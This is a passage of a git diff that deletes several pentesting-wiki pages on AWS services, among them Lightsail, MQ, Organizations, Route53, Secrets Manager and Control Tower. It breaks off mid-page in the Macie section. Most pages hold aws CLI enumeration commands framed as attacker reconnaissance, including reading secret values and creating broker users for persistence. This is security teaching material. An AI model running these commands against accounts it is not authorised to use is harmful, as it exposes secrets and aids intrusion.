-{% endhint %} - -## AWS - Lightsail - -Amazon Lightsail provides an **easy**, lightweight way for new cloud users to take advantage of AWS’ cloud computing services. It allows you to deploy common and custom web services in seconds via **VMs** (**EC2**) and **containers**.\ -It's a **minimal EC2 + Route53 + ECS**. - -### Enumeration - -```bash -# Instances -aws lightsail get-instances #Get all -aws lightsail get-instance-port-states --instance-name #Get open ports - -# Databases -aws lightsail get-relational-databases -aws lightsail get-relational-database-snapshots -aws lightsail get-relational-database-parameters - -# Disk & snapshots -aws lightsail get-instance-snapshots -aws lightsail get-disk-snapshots -aws lightsail get-disks - -# More -aws lightsail get-load-balancers -aws lightsail get-static-ips -aws lightsail get-key-pairs -``` - -### Analyse Snapshots - -It's possible to generate **instance and relational database snapshots from lightsail**. Therefore you can check those the same way you can check [**EC2 snapshots**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) and [**RDS snapshots**](aws-relational-database-rds-enum.md#enumeration). - -### Metadata - -**Metadata endpoint is accessible from lightsail**, but the machines are running in an **AWS account managed by AWS** so you don't control **what permissions are being granted**. However, if you find a way to exploit those you would be directly exploiting AWS. 
- -### Privesc - -{% content-ref url="../aws-privilege-escalation/aws-lightsail-privesc.md" %} -[aws-lightsail-privesc.md](../aws-privilege-escalation/aws-lightsail-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-lightsail-post-exploitation.md" %} -[aws-lightsail-post-exploitation.md](../aws-post-exploitation/aws-lightsail-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-lightsail-persistence.md" %} -[aws-lightsail-persistence.md](../aws-persistence/aws-lightsail-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md b/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md
deleted file mode 100644
index 30e76cde6..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md
+++ /dev/null
@@ -1,103 +0,0 @@
-# AWS - MQ Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Amazon MQ - -### Introduction to Message Brokers - -**Message brokers** serve as intermediaries, facilitating communication between different software systems, which may be built on varied platforms and programmed in different languages. **Amazon MQ** simplifies the deployment, operation, and maintenance of message brokers on AWS. It provides managed services for **Apache ActiveMQ** and **RabbitMQ**, ensuring seamless provisioning and automatic software version updates. - -### AWS - RabbitMQ - -RabbitMQ is a prominent **message-queueing software**, also known as a _message broker_ or _queue manager_. It's fundamentally a system where queues are configured. Applications interface with these queues to **send and receive messages**. Messages in this context can carry a variety of information, ranging from commands to initiate processes on other applications (potentially on different servers) to simple text messages. The messages are held by the queue-manager software until they are retrieved and processed by a receiving application. AWS provides an easy-to-use solution for hosting and managing RabbitMQ servers. - -### AWS - ActiveMQ - -Apache ActiveMQ® is a leading open-source, Java-based **message broker** known for its versatility. It supports multiple industry-standard protocols, offering extensive client compatibility across a wide array of languages and platforms. Users can: - -* Connect with clients written in JavaScript, C, C++, Python, .Net, and more. -* Leverage the **AMQP** protocol to integrate applications from different platforms. -* Use **STOMP** over websockets for web application message exchanges. -* Manage IoT devices with **MQTT**. -* Maintain existing **JMS** infrastructure and extend its capabilities. - -ActiveMQ's robustness and flexibility make it suitable for a multitude of messaging requirements. 
- -## Enumeration - -```bash -# List brokers -aws mq list-brokers - -# Get broker info -aws mq describe-broker --broker-id -## Find endpoints in .BrokerInstances -## Find if public accessible in .PubliclyAccessible - -# List usernames (only for ActiveMQ) -aws mq list-users --broker-id - -# Get user info (PASSWORD NOT INCLUDED) -aws mq describe-user --broker-id --username - -# Lits configurations (only for ActiveMQ) -aws mq list-configurations -## Here you can find if simple or LDAP authentication is used - -# Creacte Active MQ user -aws mq create-user --broker-id --password --username --console-access -``` - -{% hint style="warning" %} -TODO: Indicate how to enumerate RabbitMQ and ActiveMQ internally and how to listen in all queues and send data (send PR if you know how to do this) -{% endhint %} - -## Privesc - -{% content-ref url="../aws-privilege-escalation/aws-mq-privesc.md" %} -[aws-mq-privesc.md](../aws-privilege-escalation/aws-mq-privesc.md) -{% endcontent-ref %} - -## Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md" %} -[aws-mq-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md) -{% endcontent-ref %} - -## Persistence - -If you know the credentials to access the RabbitMQ web console, you can create a new user qith admin privileges. - -## References - -* [https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html](https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html) -* [https://activemq.apache.org/](https://activemq.apache.org/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md b/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md
deleted file mode 100644
index 06598159d..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md
+++ /dev/null
@@ -1,73 +0,0 @@
-# AWS - Organizations Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Baisc Information - -AWS Organizations facilitates the creation of new AWS accounts without incurring additional costs. Resources can be allocated effortlessly, accounts can be efficiently grouped, and governance policies can be applied to individual accounts or groups, enhancing management and control within the organization. - -Key Points: - -* **New Account Creation**: AWS Organizations allows the creation of new AWS accounts without extra charges. -* **Resource Allocation**: It simplifies the process of allocating resources across the accounts. -* **Account Grouping**: Accounts can be grouped together, making management more streamlined. -* **Governance Policies**: Policies can be applied to accounts or groups of accounts, ensuring compliance and governance across the organization. - -You can find more information in: - -{% content-ref url="../aws-basic-information/" %} -[aws-basic-information](../aws-basic-information/) -{% endcontent-ref %} - -```bash -# Get Org -aws organizations describe-organization -aws organizations list-roots - -# Get OUs, from root and from other OUs -aws organizations list-organizational-units-for-parent --parent-id r-lalala -aws organizations list-organizational-units-for-parent --parent-id ou-n8s9-8nzv3a5y - -# Get accounts -## List all the accounts without caring about the parent -aws organizations list-accounts -## Accounts from a parent -aws organizations list-accounts-for-parent --parent-id r-lalala -aws organizations list-accounts-for-parent --parent-id ou-n8s9-8nzv3a5y - -# Get basic account info -## You need the permission iam:GetAccountSummary -aws iam get-account-summary -``` - -## References - -* https://aws.amazon.com/organizations/ - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert 
(GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md b/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md
deleted file mode 100644
index 13db530f0..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md
+++ /dev/null
@@ -1,50 +0,0 @@
-# AWS - Other Services Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Directconnect - -Allows to **connect a corporate private network with AWS** (so you could compromise an EC2 instance and access the corporate network). - -``` -aws directconnect describe-connections -aws directconnect describe-interconnects -aws directconnect describe-virtual-gateways -aws directconnect describe-virtual-interfaces -``` - -## Support - -In AWS you can access current and previous support cases via the API - -``` -aws support describe-cases --include-resolved-cases -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md b/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md
deleted file mode 100644
index 96cc1cdee..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md
+++ /dev/null
@@ -1,57 +0,0 @@
-# AWS - Route53 Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Route 53 - -Amazon Route 53 is a cloud **Domain Name System (DNS)** web service.\ -You can create https, http and tcp **health checks for web pages** via Route53. - -### IP-based routing - -This is useful to tune your DNS routing to make the best DNS routing decisions for your end users.\ -IP-based routing offers you the additional ability to **optimize routing based on specific knowledge of your customer base**. - -### Enumeration - -```bash -aws route53 list-hosted-zones # Get domains -aws route53 get-hosted-zone --id -aws route53 list-resource-record-sets --hosted-zone-id # Get all records -aws route53 list-health-checks -aws route53 list-traffic-policies -``` - -### Privesc - -{% content-ref url="../aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md" %} -[route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md](../aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md b/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md
deleted file mode 100644
index 95d71ffd1..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md
+++ /dev/null
@@ -1,76 +0,0 @@
-# AWS - Secrets Manager Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS Secrets Manager - -AWS Secrets Manager is designed to **eliminate the use of hard-coded secrets in applications by replacing them with an API call**. This service serves as a **centralized repository for all your secrets**, ensuring they are managed uniformly across all applications. - -The manager simplifies the **process of rotating secrets**, significantly improving the security posture of sensitive data like database credentials. Additionally, secrets like API keys can be automatically rotated with the integration of lambda functions. - -The access to secrets is tightly controlled through detailed IAM identity-based policies and resource-based policies. - -For granting access to secrets to a user from a different AWS account, it's necessary to: - -1. Authorize the user to access the secret. -2. Grant permission to the user to decrypt the secret using KMS. -3. Modify the Key policy to allow the external user to utilize it. - -**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.** - -### **Enumeration** - -```bash -aws secretsmanager list-secrets #Get metadata of all secrets -aws secretsmanager list-secret-version-ids --secret-id # Get versions -aws secretsmanager describe-secret --secret-id # Get metadata -aws secretsmanager get-secret-value --secret-id # Get value -aws secretsmanager get-secret-value --secret-id --version-id # Get value of a different version -aws secretsmanager get-resource-policy --secret-id --secret-id -``` - -### Privesc - -{% content-ref url="../aws-privilege-escalation/aws-secrets-manager-privesc.md" %} -[aws-secrets-manager-privesc.md](../aws-privilege-escalation/aws-secrets-manager-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-secrets-manager-post-exploitation.md" %} -[aws-secrets-manager-post-exploitation.md](../aws-post-exploitation/aws-secrets-manager-post-exploitation.md) -{% endcontent-ref %} - -### 
Persistence - -{% content-ref url="../aws-persistence/aws-secrets-manager-persistence.md" %} -[aws-secrets-manager-persistence.md](../aws-persistence/aws-secrets-manager-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
deleted file mode 100644
index 203439dda..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
+++ /dev/null
@@ -1,72 +0,0 @@
-# AWS - Control Tower Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Control Tower - -{% hint style="info" %} -In summary, Control Tower is a service that allows to define policies for all your accounts inside your org. So instead of managing each of the you can set policies from COntrol Tower that will be applied on them. -{% endhint %} - -AWS Control Tower is a **service provided by Amazon Web Services (AWS)** that enables organizations to set up and govern a secure, compliant, multi-account environment in AWS. - -AWS Control Tower provides a **pre-defined set of best-practice blueprints** that can be customized to meet specific **organizational requirements**. These blueprints include pre-configured AWS services and features, such as AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, and AWS Service Catalog. - -With AWS Control Tower, administrators can quickly set up a **multi-account environment that meets organizational requirements**, such as **security** and compliance. The service provides a central dashboard to view and manage accounts and resources, and it also automates the provisioning of accounts, services, and policies. - -In addition, AWS Control Tower provides guardrails, which are a set of pre-configured policies that ensure the environment remains compliant with organizational requirements. These policies can be customized to meet specific needs. - -Overall, AWS Control Tower simplifies the process of setting up and managing a secure, compliant, multi-account environment in AWS, making it easier for organizations to focus on their core business objectives. 
- -### Enumeration - -For enumerating controltower controls, you first need to **have enumerated the org**: - -{% content-ref url="../aws-organizations-enum.md" %} -[aws-organizations-enum.md](../aws-organizations-enum.md) -{% endcontent-ref %} - -{% code overflow="wrap" %} -```bash -# Get controls applied in an account -aws controltower list-enabled-controls --target-identifier arn:aws:organizations:::ou/ -``` -{% endcode %} - -{% hint style="warning" %} -Control Tower can also use **Account factory** to execute **CloudFormation templates** in **accounts and run services** (privesc, post-exploitation...) in those accounts -{% endhint %} - -### Post Exploitation & Persistence - -{% content-ref url="../../aws-post-exploitation/aws-control-tower-post-exploitation.md" %} -[aws-control-tower-post-exploitation.md](../../aws-post-exploitation/aws-control-tower-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md
deleted file mode 100644
index 588e24ab1..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md
+++ /dev/null
@@ -1,41 +0,0 @@
-# AWS - Cost Explorer Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cost Explorer and Anomaly detection - -This allows you to check **how are you expending money in AWS services** and help you **detecting anomalies**.\ -Moreover, you can configure an anomaly detection so AWS will warn you when some a**nomaly in costs is found**. - -### Budgets - -Budgets help to **manage costs and usage**. You can get **alerted when a threshold is reached**.\ -Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md
deleted file mode 100644
index 35ff808ba..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md
+++ /dev/null
@@ -1,42 +0,0 @@
-# AWS - Detective Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Detective - -**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations. - -The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause. - -## References - -* [https://aws.amazon.com/detective/](https://aws.amazon.com/detective/) -* [https://cloudsecdocs.com/aws/services/logging/other/#detective](https://cloudsecdocs.com/aws/services/logging/other/#detective) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md
deleted file mode 100644
index 6667dcf6b..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md
+++ /dev/null
@@ -1,145 +0,0 @@
-# AWS - Macie Enum
-
-## AWS - Macie Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Macie - -Amazon Macie stands out as a service designed to **automatically detect, classify, and identify data** within an AWS account. It leverages **machine learning** to continuously monitor and analyze data, primarily focusing on detecting and alerting against unusual or suspicious activities by examining **cloud trail event** data and user behavior patterns. - -Key Features of Amazon Macie: - -1. **Active Data Review**: Employs machine learning to review data actively as various actions occur within the AWS account. -2. **Anomaly Detection**: Identifies irregular activities or access patterns, generating alerts to mitigate potential data exposure risks. -3. **Continuous Monitoring**: Automatically monitors and detects new data in Amazon S3, employing machine learning and artificial intelligence to adapt to data access patterns over time. -4. **Data Classification with NLP**: Utilizes natural language processing (NLP) to classify and interpret different data types, assigning risk scores to prioritize findings. -5. **Security Monitoring**: Identifies security-sensitive data, including API keys, secret keys, and personal information, helping to prevent data leaks. - -Amazon Macie is a **regional service** and requires the 'AWSMacieServiceCustomerSetupRole' IAM Role and an enabled AWS CloudTrail for functionality. - -### Alert System - -Macie categorizes alerts into predefined categories like: - -* Anonymized access -* Data compliance -* Credential Loss -* Privilege escalation -* Ransomware -* Suspicious access, etc. - -These alerts provide detailed descriptions and result breakdowns for effective response and resolution. - -### Dashboard Features - -The dashboard categorizes 